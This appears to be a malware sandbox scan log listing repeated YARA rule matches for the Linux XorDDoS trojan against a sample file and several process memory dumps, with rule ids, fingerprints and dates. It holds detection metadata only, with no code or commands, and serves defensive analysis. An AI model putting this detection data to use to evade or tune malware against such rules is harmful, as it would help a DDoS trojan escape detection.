Source: fuck.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: fuck.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: fuck.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6235.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6561.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6561.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6561.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6561.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6561.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6561.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
